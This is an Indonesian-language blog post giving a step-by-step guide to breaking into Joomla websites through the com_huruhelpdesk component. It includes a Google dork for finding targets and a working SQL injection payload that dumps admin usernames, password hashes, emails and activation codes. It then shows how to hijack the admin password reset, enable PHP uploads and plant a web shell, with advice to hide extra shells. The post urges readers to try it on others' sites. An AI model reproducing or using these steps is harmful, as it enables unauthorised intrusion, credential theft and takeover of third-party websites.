ok langsung saja kita menuju step by step dalam pengerjaannya.
==========
[+] step 1
==========
Buka google.. ketik keyword :
Code: "inurl:/index.php?option=com_huruhelpdesk\"
Atau silahkan ke sini untuk liat Exploitnya Databasenya : Exploit Database
Tes satu per satu
coba kita ambil yang ini :
==========
[+] step 2
==========
Pasang exploit..
/index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1/**/union/**/select/**/1,2,3,concat(username,0x3a,password,0x3a,email),5,6,7+from+jos_users--
Maka akan menghasilkan gambar seperti dibawah ini:
Nah kita akan melihat admin nya... :P
==========
[+] step 3
==========
Coba kita reset password nya :
/index.php?option=com_user&view=reset
hmmm... minta email dia.. masukin saja email admin tadi..
Then enter..
==========
[+] step 4
==========
Minta activation pula
hmm.. gimana ne?
tenang.. kita cari dulu activationnya :
Code: /index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1/**/union/**/select/**/1,2,3,concat(username,0x3a,password,0x3a,email,0x3a,activation),5,6,7+from+jos_users--
Tuh kan keluar activatifasinya
hehehe
:)
lanjut...
copas aja ke yang tadi.. enter.. :)
==========
[+] step 5
==========
copas aja ke yang tadi.. enter.. :)
==========
[+] step 6
==========
Hehehehe
Dia minta pasword baru tu.. kasih aja..
==========
[+] step 7
==========
OK langsung aja masuk ke admin nya..
http://[site]/[pacth]/administrator
==========
[+] step 8
==========
masuk ternyata.. heheh
sabar²..
nah.. di sini ente harus ubah dulu "Global configuration" nya
lalu setelah itu masuk ke "media manager"
==========
[+] step 9
==========
Nah.. kita ke global configuration terlebih dahulu...
Ubah media settingnya, tambahin aja extension PHP
jangan lupa di save..
:D
==========
[+] step 10
==========
OK
lanjut..
Buka media manager..
nah, ini tahap terakhir..
Silahkan Upload Shell php mu..
seep selesai..
Bila tidak ada tulisan berwarna merah berarti berhasil..
Maka Shell kita akan berada di sini :
http://[site]/[pacth]/images/namashell.php
OK sekarang terserah kalian.. mau diapain tu site..
saran saya.. kalo bisa..
upload aja lagi shell di directory yang lain..
lalu hapus shell yang di directory images tadi..
sekian aja dulu
Selamat mencoba.. :D
0 comments:
Post a Comment